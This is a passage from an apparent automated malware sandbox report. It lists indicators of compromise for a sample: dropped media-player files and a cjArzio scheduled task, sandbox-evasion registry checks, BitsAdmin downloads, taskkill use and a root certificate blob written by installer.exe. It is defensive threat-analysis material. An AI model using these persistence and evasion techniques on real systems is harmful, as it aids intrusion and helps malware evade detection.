(x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_imem_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libes_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_228ef1_256x240.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\meta\art\00_musicbrainz.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\cjArzio\cache.dat powershell.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist.xml autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\rockbox_fm_presets.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libps_plugin.dll autosubplayer.exe File created C:\Program Files\temp_files\cache.dat data_load.exe File created C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libwaveout_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\librawvid_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\cli.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mlp_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libpva_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_flac_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\cjArzio powershell.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\Other-48.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\modules\dkjson.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libshm_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libaiff_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png autosubplayer.exe -
Drops file in Windows directory 25 IoCs
description ioc Process File created C:\Windows\Installer\f777110.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI916C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9C10.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\SystemTemp\~DFCFD1DB01117DD674.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI82B.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF610B064033517CEF.TMP msiexec.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File opened for modification C:\Windows\Installer\MSI9003.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI99DC.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\SystemTemp\~DFD5CEF241E719B52C.TMP msiexec.exe File opened for modification C:\Windows\Tasks\SA.DAT svchost.exe File opened for modification C:\Windows\Installer\MSIAC3F.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9238.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI945C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9AE6.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F} msiexec.exe File opened for modification C:\Windows\Installer\MSIA161.tmp msiexec.exe File created C:\Windows\Tasks\cjArzio.job rundll32.exe File opened for modification C:\Windows\Installer\f777110.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI798C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9631.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF5F463882B3DBA811.TMP msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 21 IoCs
pid pid_target Process procid_target 4748 1068 WerFault.exe 107 1060 2532 WerFault.exe 122 3980 4296 WerFault.exe 103 4644 3408 WerFault.exe 109 5224 6120 WerFault.exe 177 5128 6132 WerFault.exe 176 1724 5272 WerFault.exe 149 5136 5300 WerFault.exe 179 6128 5428 WerFault.exe 162 6944 5492 WerFault.exe 157 1172 2452 WerFault.exe 270 6648 6048 WerFault.exe 266 6416 4788 WerFault.exe 271 2028 6088 WerFault.exe 297 5748 3104 WerFault.exe 331 6296 7068 WerFault.exe 340 2068 3148 WerFault.exe 342 7024 1744 WerFault.exe 343 6004 6452 WerFault.exe 382 2228 5956 WerFault.exe 420 1044 2208 WerFault.exe 407 -
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI UNPgDYBJfd6kF2hyuwASzsYz.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI explorer.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI explorer.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI EE1A.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI UNPgDYBJfd6kF2hyuwASzsYz.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI UNPgDYBJfd6kF2hyuwASzsYz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI EE1A.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI EE1A.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz powershell.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier powershell.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString qBm1tEm07kjon3FOZ_6bAk3D.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier Calculator.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Process not Found Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2640 schtasks.exe 5340 schtasks.exe -
Delays execution with timeout.exe 4 IoCs
pid Process 2284 timeout.exe 6896 timeout.exe 2776 timeout.exe 3348 timeout.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 5280 bitsadmin.exe -
Enumerates system info in registry 2 TTPs 45 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Calculator.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Calculator.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU powershell.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Process not Found Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS powershell.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Process not Found Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe -
Kills process with taskkill 4 IoCs
pid Process 864 taskkill.exe 5156 taskkill.exe 5480 taskkill.exe 4324 taskkill.exe -
Modifies data under HKEY_USERS 46 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ProviderPasswordLength = "8" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot sihclient.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ProviderPasswordCharacterGroups = "2" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates sihclient.exe -
Modifies registry class 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Process not Found Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{F9B4851F-6C11-4E73-9071-8D8533E3E257} Calculator.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{418917A6-CC21-432D-90B1-F938CC78EA82} Calculator.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d